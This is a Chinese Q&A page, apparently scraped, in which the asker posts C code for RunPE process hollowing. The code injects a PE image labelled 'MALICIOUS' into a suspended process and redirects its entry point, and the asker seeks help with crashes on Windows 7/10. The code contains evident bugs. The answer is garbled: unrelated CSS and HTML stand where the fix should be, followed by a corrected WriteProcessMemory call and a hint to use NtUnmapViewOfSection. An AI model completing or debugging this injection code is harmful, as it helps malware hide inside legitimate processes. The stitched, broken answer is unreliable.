问题描述
我正在尝试使用RunPE技术(用于学习)。
首先,我在Windows XP(32位)上尝试了此操作,但未发生任何错误,但(HelloWorld)的注入代码未运行。
然后,我尝试在Windows 7和10(64位)上使用它,并在线程恢复时收到此错误[0xc00000005]。为什么会出现此错误,为什么注入的代码无法在XP计算机上运行?
我也尝试取消映射数据库(0x00400000),但是我遇到了同样的问题。
我的代码:
int runPe(void* image) {
IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];
GetModuleFileNameA(0,currentpath,1024); //path to the current exe
//Identifying the MALICIOUS IMAGE HEADERS
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
if (CreateProcessA(currentpath,NULL,FALSE,CREATE_SUSPENDED,&sinfo,&pinfo)) {
printf("[*] Suspended process is created\n");
Sleep(600);
//Allocate memory for the context of suspended process
ctx = (LPCONTEXT)(VirtualAlloc(NULL,sizeof(ctx),MEM_COMMIT,PAGE_READWRITE));
if (ctx) {
ctx->ContextFlags = CONTEXT_FULL;
printf("[*] Context is allocated successfully\n");
Sleep(600);
//Get the thread context
if (GetThreadContext(pinfo.hThread,(LPCONTEXT)ctx)) {
printf("[*] Allocating MALICIOUS image headers into the suspended process\n");
Sleep(600);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8),(LPVOID)(&ImageBase),4,0);
pImage = VirtualAllocEx(pinfo.hProcess,ntHeader->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (pImage) {
printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASE\n");
Sleep(600);
//Writing the image intor the process address space
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)pImage,image,ntHeader->OptionalHeader.SizeOfHeaders,NULL)) {
printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASE\n");
Sleep(600);
//sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
{
sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
if (sectionHeader->SizeOfRawData == 00000000)
continue;
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),(LPVOID)((DWORD)image + sectionHeader->PointerToRawData),sectionHeader->SizeOfRawData,0))
{
printf("[*] Allocating memory for Section %d at %X\n",i,(LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
Sleep(600);
}
else
{
printf("ERROR: Writing section (%d) into memory failed\n",i);
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
//Change the imageBase address from the suspened process into the MALICIOUS
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),0)) {
printf("[*] Image base address is changed to MALICIOUS\n");
Sleep(600);
//Now we will move the address of entrypoint to the MALCIOUS image
// At EAX register
ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
printf("[*] AddressOfEntryPoint is changed to MALICIOUS\n");
Sleep(600);
//Set Thread Context and resume it
SetThreadContext(pinfo.hThread,(LPCONTEXT)ctx);
ResumeThread(pinfo.hThread);
printf("[*] Thread is resumed\n");
}
else
{
printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Writing the image into the process address space failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: GetThreadContext failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Context allocation failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
return 0;
}
else
{
printf("ERROR: Invalid nt SIGNATURE\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
解决方法
它有效,我认为将图像库地址更改为注入的代码时出错。
我认为错误在这里:
#block {
position:relative;
}
.pLined {
position:relative;
}
.pLined > span {
display:block;
}
#div {
position:absolute;
display:none;
color:white;
background-color:rgba(255,0.75);
top:auto;
left:auto;
z-index:1;
}
#div.toLine {
display:block;
}
已修改(错误是指向图像缓冲区的指针错误)
<div id="block">
<p class="pLined">
<span>Line 1 Text</span>
<span>Line 2 Text</span>
<span>Line 3 Text</span>
<span>Line 4 Text</span>
<span>Line 5 Text</span>
</p>
<button id="btn">Div</button>
<div id="div"></div>
</div>
,然后使用NtUnmapViewOfSection取消映射图片库地址:
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),4,0))